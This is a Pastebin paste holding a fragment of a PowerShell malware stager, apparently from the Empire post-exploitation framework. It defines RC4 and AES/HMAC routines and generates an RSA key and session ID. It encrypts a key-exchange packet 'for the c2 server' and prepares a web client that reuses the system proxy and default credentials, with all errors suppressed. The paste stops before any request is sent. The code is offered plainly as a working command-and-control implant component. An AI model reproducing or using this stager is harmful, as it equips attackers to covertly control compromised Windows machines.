Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Start-Negotiate {
- param($s,$PK,$UB='Mozilla/6.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
- function ConvertTo-RC4ByteStream {
- Param ($RCK, $In)
- begin {
- [Byte[]] $Str = 0..255;
- $J = 0;
- 0..255 | ForEach-Object {
- $J = ($J + $Str[$_] + $RCK[$_ % $RCK.Length]) % 256;
- $Str[$_], $Str[$J] = $Str[$J], $Str[$_];
- };
- $I = $J = 0;
- }
- process {
- ForEach($Byte in $In) {
- $I = ($I + 1) % 256;
- $J = ($J + $Str[$I]) % 256;
- $Str[$I], $Str[$J] = $Str[$J], $Str[$I];
- $Byte -bxor $Str[($Str[$I] + $Str[$J]) % 256];
- }
- }
- }
- function Decrypt-Bytes {
- param ($Key, $In)
- if($In.Length -gt 32) {
- $HMAC = New-Object System.Security.Cryptography.HMACSHA256;
- $e=[System.Text.Encoding]::ASCII;
- # Verify the HMAC
- $Mac = $In[-10..-1];
- $In = $In[0..($In.length - 11)];
- $hmac.Key = $e.GetBytes($Key);
- $Expected = $hmac.ComputeHash($In)[0..9];
- if (@(Compare-Object $Mac $Expected -Sync 0).Length -ne 0) {
- return;
- }
- # extract the IV
- $IV = $In[0..15];
- try {
- $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
- }
- catch {
- $AES=New-Object System.Security.Cryptography.RijndaelManaged;
- }
- $AES.Mode = "CBC";
- $AES.Key = $e.GetBytes($Key);
- $AES.IV = $IV;
- ($AES.CreateDecryptor()).TransformFinalBlock(($In[16..$In.length]), 0, $In.Length-16)
- }
- }
- # make sure the appropriate assemblies are loaded
- $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
- $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
- # try to ignore all errors
- $ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
- $customHeaders = "";
- $PKB=$e.GetBytes($PK);
- # set up the AES/HMAC crypto
- # $PK -> staging key for this server
- try {
- $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
- }
- catch {
- $AES=New-Object System.Security.Cryptography.RijndaelManaged;
- }
- $IV = [byte] 0..255 | Get-Random -count 16;
- $AES.Mode="CBC";
- $AES.Key=$PKB;
- $AES.IV = $IV;
- $hmac = New-Object System.Security.Cryptography.HMACSHA256;
- $hmac.Key = $PKB;
- $csp = New-Object System.Security.Cryptography.CspParameters;
- $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
- $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
- # export the public key in the only format possible...stupid
- $rk=$rs.ToXmlString($False);
- # generate a randomized sessionID of 8 characters
- $ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);
- # build the packet of (xml_key)
- $ib=$e.getbytes($rk);
- # encrypt/HMAC the packet for the c2 server
- $eb=$IV+$AES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length);
- $eb=$eb+$hmac.ComputeHash($eb)[0..9];
- # if the web client doesn't exist, create a new web client and set appropriate options
- # this only happens if this stager.ps1 code is NOT called from a launcher context
- if(-not $wc) {
- $wc=New-Object System.Net.WebClient;
- # set the proxy settings for the WC to be the default system settings
- $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
- $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
- }
- if ($Script:Proxy) {
- $wc.Proxy = $Script:Proxy;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement